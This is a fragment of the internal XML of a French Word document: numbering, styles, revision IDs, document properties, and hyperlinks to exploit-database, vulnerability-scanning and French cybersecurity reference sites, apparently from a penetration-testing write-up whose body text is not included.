  <w:num w:numId="108" w16cid:durableId="1184855103">
    <w:abstractNumId w:val="139"/>
  </w:num>
  <w:num w:numId="109" w16cid:durableId="1330713834">
    <w:abstractNumId w:val="44"/>
  </w:num>
  <w:num w:numId="110" w16cid:durableId="311718255">
    <w:abstractNumId w:val="71"/>
  </w:num>
  <w:num w:numId="111" w16cid:durableId="51394391">
    <w:abstractNumId w:val="136"/>
  </w:num>
  <w:num w:numId="112" w16cid:durableId="1483161494">
    <w:abstractNumId w:val="123"/>
  </w:num>
  <w:num w:numId="113" w16cid:durableId="1412894251">
    <w:abstractNumId w:val="152"/>
  </w:num>
  <w:num w:numId="114" w16cid:durableId="1967617704">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="115" w16cid:durableId="1597056568">
    <w:abstractNumId w:val="79"/>
  </w:num>
  <w:num w:numId="116" w16cid:durableId="292441757">
    <w:abstractNumId w:val="41"/>
  </w:num>
  <w:num w:numId="117" w16cid:durableId="1733428426">
    <w:abstractNumId w:val="65"/>
  </w:num>
  <w:num w:numId="118" w16cid:durableId="2065252054">
    <w:abstractNumId w:val="73"/>
  </w:num>
  <w:num w:numId="119" w16cid:durableId="303311703">
    <w:abstractNumId w:val="129"/>
  </w:num>
  <w:num w:numId="120" w16cid:durableId="1915970106">
    <w:abstractNumId w:val="60"/>
  </w:num>
  <w:num w:numId="121" w16cid:durableId="407505636">
    <w:abstractNumId w:val="69"/>
  </w:num>
  <w:num w:numId="122" w16cid:durableId="578952457">
    <w:abstractNumId w:val="145"/>
  </w:num>
  <w:num w:numId="123" w16cid:durableId="33237854">
    <w:abstractNumId w:val="144"/>
  </w:num>
  <w:num w:numId="124" w16cid:durableId="1043943963">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="125" w16cid:durableId="919631844">
    <w:abstractNumId w:val="90"/>
  </w:num>
  <w:num w:numId="126" w16cid:durableId="342711060">
    <w:abstractNumId w:val="159"/>
  </w:num>
  <w:num w:numId="127" w16cid:durableId="606233111">
    <w:abstractNumId w:val="98"/>
  </w:num>
  <w:num w:numId="128" w16cid:durableId="1776055717">
    <w:abstractNumId w:val="23"/>
  </w:num>
  <w:num w:numId="129" w16cid:durableId="1778524068">
    <w:abstractNumId w:val="104"/>
  </w:num>
  <w:num w:numId="130" w16cid:durableId="279607984">
    <w:abstractNumId w:val="48"/>
  </w:num>
  <w:num w:numId="131" w16cid:durableId="23941560">
    <w:abstractNumId w:val="120"/>
  </w:num>
  <w:num w:numId="132" w16cid:durableId="1643079656">
    <w:abstractNumId w:val="108"/>
  </w:num>
  <w:num w:numId="133" w16cid:durableId="427696317">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="134" w16cid:durableId="209222800">
    <w:abstractNumId w:val="40"/>
  </w:num>
  <w:num w:numId="135" w16cid:durableId="630987002">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="136" w16cid:durableId="1111362710">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="137" w16cid:durableId="631179277">
    <w:abstractNumId w:val="103"/>
  </w:num>
  <w:num w:numId="138" w16cid:durableId="468323639">
    <w:abstractNumId w:val="133"/>
  </w:num>
  <w:num w:numId="139" w16cid:durableId="1457914000">
    <w:abstractNumId w:val="162"/>
  </w:num>
  <w:num w:numId="140" w16cid:durableId="136723336">
    <w:abstractNumId w:val="122"/>
  </w:num>
  <w:num w:numId="141" w16cid:durableId="1284263091">
    <w:abstractNumId w:val="91"/>
  </w:num>
  <w:num w:numId="142" w16cid:durableId="887835316">
    <w:abstractNumId w:val="163"/>
  </w:num>
  <w:num w:numId="143" w16cid:durableId="1822043940">
    <w:abstractNumId w:val="164"/>
  </w:num>
  <w:num w:numId="144" w16cid:durableId="1846632792">
    <w:abstractNumId w:val="59"/>
  </w:num>
  <w:num w:numId="145" w16cid:durableId="1489711993">
    <w:abstractNumId w:val="147"/>
  </w:num>
  <w:num w:numId="146" w16cid:durableId="425150147">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="147" w16cid:durableId="1511868642">
    <w:abstractNumId w:val="130"/>
  </w:num>
  <w:num w:numId="148" w16cid:durableId="333873055">
    <w:abstractNumId w:val="121"/>
  </w:num>
  <w:num w:numId="149" w16cid:durableId="416562422">
    <w:abstractNumId w:val="93"/>
  </w:num>
  <w:num w:numId="150" w16cid:durableId="833490027">
    <w:abstractNumId w:val="115"/>
  </w:num>
  <w:num w:numId="151" w16cid:durableId="277301048">
    <w:abstractNumId w:val="137"/>
  </w:num>
  <w:num w:numId="152" w16cid:durableId="1836408817">
    <w:abstractNumId w:val="114"/>
  </w:num>
  <w:num w:numId="153" w16cid:durableId="655380106">
    <w:abstractNumId w:val="78"/>
  </w:num>
  <w:num w:numId="154" w16cid:durableId="180900571">
    <w:abstractNumId w:val="116"/>
  </w:num>
  <w:num w:numId="155" w16cid:durableId="746153592">
    <w:abstractNumId w:val="118"/>
  </w:num>
  <w:num w:numId="156" w16cid:durableId="92626668">
    <w:abstractNumId w:val="160"/>
  </w:num>
  <w:num w:numId="157" w16cid:durableId="2033606819">
    <w:abstractNumId w:val="142"/>
  </w:num>
  <w:num w:numId="158" w16cid:durableId="388459226">
    <w:abstractNumId w:val="140"/>
  </w:num>
  <w:num w:numId="159" w16cid:durableId="1701542684">
    <w:abstractNumId w:val="125"/>
  </w:num>
  <w:num w:numId="160" w16cid:durableId="301891214">
    <w:abstractNumId w:val="51"/>
  </w:num>
  <w:num w:numId="161" w16cid:durableId="156581156">
    <w:abstractNumId w:val="97"/>
  </w:num>
  <w:num w:numId="162" w16cid:durableId="264072486">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="163" w16cid:durableId="2047825835">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="164" w16cid:durableId="533036943">
    <w:abstractNumId w:val="87"/>
  </w:num>
  <w:num w:numId="165" w16cid:durableId="1147893501">
    <w:abstractNumId w:val="165"/>
  </w:num>
  <w:num w:numId="166" w16cid:durableId="1807315464">
    <w:abstractNumId w:val="149"/>
  </w:num>
  <w:num w:numId="167" w16cid:durableId="81024986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72"/>
    <w:rsid w:val="00096AD8"/>
    <w:rsid w:val="000D4674"/>
    <w:rsid w:val="000E037B"/>
    <w:rsid w:val="00187A56"/>
    <w:rsid w:val="00223B72"/>
    <w:rsid w:val="00240329"/>
    <w:rsid w:val="00297E5A"/>
    <w:rsid w:val="002C115C"/>
    <w:rsid w:val="002D2B24"/>
    <w:rsid w:val="002D5BEE"/>
    <w:rsid w:val="002F1753"/>
    <w:rsid w:val="00302CD2"/>
    <w:rsid w:val="00342D35"/>
    <w:rsid w:val="003967A2"/>
    <w:rsid w:val="003F2034"/>
    <w:rsid w:val="003F5002"/>
    <w:rsid w:val="004073B4"/>
    <w:rsid w:val="004915D4"/>
    <w:rsid w:val="004D256A"/>
    <w:rsid w:val="00514942"/>
    <w:rsid w:val="005276F0"/>
    <w:rsid w:val="00534394"/>
    <w:rsid w:val="00635AE4"/>
    <w:rsid w:val="006B4620"/>
    <w:rsid w:val="006C2550"/>
    <w:rsid w:val="00790EFE"/>
    <w:rsid w:val="007E7234"/>
    <w:rsid w:val="007F1D01"/>
    <w:rsid w:val="0081458C"/>
    <w:rsid w:val="00826D46"/>
    <w:rsid w:val="008749E8"/>
    <w:rsid w:val="008B43C5"/>
    <w:rsid w:val="009367FF"/>
    <w:rsid w:val="009827A9"/>
    <w:rsid w:val="009A3818"/>
    <w:rsid w:val="009F7EFA"/>
    <w:rsid w:val="00A41325"/>
    <w:rsid w:val="00A44E23"/>
    <w:rsid w:val="00A73515"/>
    <w:rsid w:val="00AA17C6"/>
    <w:rsid w:val="00AC29FF"/>
    <w:rsid w:val="00AE5DD7"/>
    <w:rsid w:val="00B20CBE"/>
    <w:rsid w:val="00B41BA6"/>
    <w:rsid w:val="00BA62A7"/>
    <w:rsid w:val="00BD3814"/>
    <w:rsid w:val="00CE66A8"/>
    <w:rsid w:val="00D14767"/>
    <w:rsid w:val="00DD1A74"/>
    <w:rsid w:val="00E14CE2"/>
    <w:rsid w:val="00E861EC"/>
    <w:rsid w:val="00E93F09"/>
    <w:rsid w:val="00EB280C"/>
    <w:rsid w:val="00F05E70"/>
    <w:rsid w:val="00F1129E"/>
    <w:rsid w:val="00F14980"/>
    <w:rsid w:val="00F93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CF4"/>
  <w15:docId w15:val="{06BDFD4F-01F4-B446-89C7-11DB7A9B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0E037B"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Citationintense">
    <w:name w:val="Intense Quote"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="CitationintenseCar"/>
    <w:uiPriority w:val="30"/>
    <w:qFormat/>
    <w:rsid w:val="000E03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E037B"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="4F81BD" w:themeColor="accent1"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="En-tte">
    <w:name w:val="header"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="En-tteCar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="009367FF"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4536"/>
        <w:tab w:val="right" w:pos="9072"/>
      </w:tabs>
      <w:spacing w:line="240" w:lineRule="auto"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="En-tteCar">
    <w:name w:val="En-tête Car"/>
    <w:basedOn w:val="Policepardfaut"/>
    <w:link w:val="En-tte"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="009367FF"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Pieddepage">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="PieddepageCar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="009367FF"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4536"/>
        <w:tab w:val="right" w:pos="9072"/>
      </w:tabs>
      <w:spacing w:line="240" w:lineRule="auto"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="PieddepageCar">
    <w:name w:val="Pied de page Car"/>
    <w:basedOn w:val="Policepardfaut"/>
    <w:link w:val="Pieddepage"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="009367FF"/>
  </w:style>
  <w:style w:type="character" w:styleId="Lienhypertexte">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="Policepardfaut"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="003967A2"/>
    <w:rPr>
      <w:color w:val="0000FF" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Mentionnonrsolue">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="Policepardfaut"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="0039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drive.google.com/file/d/1zvO7eu_yUb3aXLttWHHr7BrDAzSXIF4E/view?usp=drive_link"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hyperlink" Target="https://github.com/offensive-security/exploit-database-bin-sploits"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hyperlink" Target="http://localhost" TargetMode="External"/><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xploit-db.com"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192.168.1.96"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github.com/scipag/vulscan.git" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/offensive-security/exploit-database-papers" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://127.0.0.1:5151"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gi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sintframework.com" TargetMode="External"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.rapid7.com"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offensive-security/exploit-database"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yperlink" Target="http://www.internet-signalement.gouv.fr"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s://cyber.gouv.fr/sites/default/files/document/R%C3%A9f%C3%A9rentiel%20PASSI%20%E2%80%93%20version%202.1-a%20%E2%80%93%20sans%20marque%20de%20r%C3%A9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F718-1E23-4CD7-AC23-7B828B95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6</Pages>
  <Words>9517</Words>
  <Characters>52346</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NON Etienne</cp:lastModifiedBy>
  <cp:revision>60</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-10-22T08:21:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-10-27T14:46:00Z</dcterms:modified>
</cp:coreProperties>
</file>